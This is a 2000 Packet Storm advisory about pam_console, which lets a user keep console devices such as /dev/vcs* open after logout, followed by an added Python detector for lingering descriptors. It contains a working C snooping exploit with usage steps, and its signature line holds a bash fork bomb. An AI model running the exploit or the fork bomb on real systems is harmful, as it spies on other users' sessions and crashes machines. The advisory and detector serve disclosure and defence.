pam_console.bug

17 May 2000 | Reported by Packet Storm | Type: packetstorm | Source: packetstormsecurity.com

Potential security risk due to pam_console allowing snooping on tty devices after logout.

Code
`When accepting luser console login, pam_console called by /bin/login tries  
to be user-friendly, doing several chowns on devices like login tty and  
corresponding vcs[a] device, as well as other interesting devices: fd*,  
audio devices (dsp*, mixer*, audio*, midi*, sequencer), cdrom,  
streamer/zip drive devices, frame buffer devices, kbd*, js*, video*,  
radio*, winradio*, vtx*, vbi* and so on. Probably it's designed to make  
console logins more comfortable, but has DEADLY effects on servers with  
console luser-login ability (and that's quite common).  
  
On logout, these devices are chown'ed back to root, but unlike  
/dev/tty[0-9], these devices have no hangup mechanism, so user will have  
full control over them after logout by opening them and then keeping the  
file descriptor. The easiest attack is read-write snooping of consoles.  
Log in on console once, open /dev/vcsX (where X corresponds to tty  
number), then logout. By continuous lseek/read loop, your program will be  
able to snoop further logins on this console - forever. Also, it's possible  
to write() on snooped console... Ugh. Other possibilities include reading  
any inserted cd, reading/writing any inserted floppy, messing with  
video/audio devices and so on, all in the same way.  
  
Minimal tty snoop exploit:  
  
-- vcssnoop.c --  
#include <sys/fcntl.h>  
  
main(int argc,char*argv[]) {  
char buf[80*24];  
int f=open(argv[1],O_RDWR);  
while (1) {  
lseek(f,0,0);  
read(f,buf,sizeof(buf));  
write(1,"\033[2J\033[H",7); // clear terminal, vt100/linux/ansi  
write(1,buf,sizeof(buf));  
usleep(10000);  
}  
}  
-- EOF --  
  
Log onto console, let's say it's tty3. Then, compile and launch this  
program via screen, giving path to vcs device corresponding to your login  
tty (in this case, /dev/tty3). Then, detach this screen and logout. Wait  
some time, log in remotely to your account and resume screen session. You  
should see real-time tty3 dump.  
  
_______________________________________________________  
Michal Zalewski [[email protected]] [tp.internet/security]  
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:  
=-----=> God is real, unless declared integer. <=-----=  
`
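
A defender-side check for the condition the advisory describes, as an added example that is not part of the original advisory: it walks /proc and reports processes that still hold open descriptors on the device nodes the advisory lists while their owner is neither root nor a current console user. The pattern list, the function names and the `trusted_uids` parameter are assumptions made for this illustration.

```python
import fnmatch
import os

# Device name patterns taken from the advisory's list of nodes that
# pam_console hands to the console user (assumed subset; extend as needed).
WATCHED = ["vcs*", "fd[0-9]*", "dsp*", "mixer*", "audio*", "midi*",
           "sequencer", "kbd*", "js*", "video*", "radio*", "vtx*", "vbi*"]


def is_watched(target, dev_dir="/dev"):
    """True if an fd link target is a watched device node directly in dev_dir."""
    head, name = os.path.split(target)
    return head == dev_dir.rstrip("/") and any(
        fnmatch.fnmatch(name, pattern) for pattern in WATCHED)


def lingering_fds(proc_root="/proc", dev_dir="/dev", trusted_uids=frozenset({0})):
    """Return sorted (pid, uid, device) tuples for processes that hold a
    watched device open and whose owner is not in trusted_uids.
    trusted_uids should be root plus whoever is on the console right now."""
    findings = set()
    for entry in os.listdir(proc_root):
        if not entry.isdigit():          # skip /proc/self, /proc/sys, ...
            continue
        pid_dir = os.path.join(proc_root, entry)
        fd_dir = os.path.join(pid_dir, "fd")
        try:
            # /proc/<pid> is normally owned by the process's effective uid
            uid = os.stat(pid_dir).st_uid
            fds = os.listdir(fd_dir)
        except OSError:                  # process exited or access denied
            continue
        if uid in trusted_uids:
            continue
        for fd in fds:
            try:
                target = os.readlink(os.path.join(fd_dir, fd))
            except OSError:
                continue
            if is_watched(target, dev_dir):
                findings.add((int(entry), uid, target))
    return sorted(findings)


if __name__ == "__main__":
    # Needs root to read other users' /proc/<pid>/fd entries.
    for pid, uid, dev in lingering_fds():
        print(f"pid {pid} (uid {uid}) still holds {dev}")
```

Run it after a console logout, or periodically with `trusted_uids` set to root plus the uid of the current console user; any hit is a descriptor that survived the chown back to root.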
